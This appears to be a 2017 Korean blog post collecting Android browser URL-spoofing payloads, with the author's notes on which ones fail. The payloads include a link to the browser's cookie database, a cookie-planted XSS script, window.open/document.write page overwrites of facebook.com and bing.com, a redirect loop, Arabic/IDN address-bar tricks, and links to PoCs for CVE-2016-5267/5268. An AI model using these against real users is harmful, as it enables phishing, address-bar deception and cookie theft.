Hacking/App.

Android URL Spoofing cheat sheet

2017. 10. 28. 01:15

http://182.176.65.7/%EF%B9%B0/http://google.com/test.





<a href='file:///data/data/com.android.browser/databases/webviewCookiesChromium.db '> 

Redirecting... To continue, tap and hold here, then choose "Open in a new tab" 

</a> 

<script> 

document.cookie='x=<img src=x onerror=prompt(document.body.innerHTML)>';    

</script>


안됨. 그냥 클릭누르면 아무 것도 하지 않음




puffin web browser 


<script> 

w = window.open(‘http://www.facebook.com’); 

w.document.write(‘<html>Hacked</html>’) 

w.focus();

</script>


스크립트 실행 자체가 안됨.



<script> 

w = window.open("https://www.bing.com", "_blank"); 

setTimeout(function() { 

w.document.write("<html>hacked</html>")

},5000); 

</script> 


스크립트 실행이 안됨.




<script>  

alert(1337)

function spoof() {  

location="http://www.dailymail.co.uk/home/index.html?random="+Math.random(); 

}  setInterval("spoof()",10); 

</script>


"중지하는 중.." 이라는 말만 뜨고 다른 건 없다. 근데 계속 www.dailymail.co.uk 로 이동하려고 하긴 한다. 계속 왔다리갔다리 하다가 결국에는 이동하긴 한다. 이것이 url spoofing 취약점인가ㅏ...?





<a onclick="test()">CLICK</a>

<script>

    function test() {

        window.open('http://bing.com/') setTimeout(function() {

            alert("HACKED");

        }, 5000)

    }

</script>


CLICK 버튼이 눌리지 않는다. 




아랍어를 이용해서 URL Spoofing 

http://www.securityweek.com/address-bar-spoofing-vulnerability-found-several-browsers


CVE-2016-5267로 등록되었다고 한다. 




http://127.0.0.1/|/http://example.com.

http://example.com/|/127.0.0.1.


이 URL이 http://example.com/|/127.0.0.1 처럼 되는지 확인해보자

이게 아랍어를 이용해서 Hacking하는 것이라고 한다.




http://عربي.امارات/google.com/test/test/test




CVE-2016-5268 를 이용한 Payload


http://me6.com/mozilla/poc1.html


http://me6.com/mozilla/poc2.html



'Hacking > App.' 카테고리의 다른 글

CTF Python Jail tips - 3  (0) 2018.02.18
CTF Python Jail tips 2  (1) 2018.02.16
CTF Python Jail Tips  (0) 2018.02.08
System overall  (0) 2018.01.05
JEB 초기 사용법  (0) 2017.09.28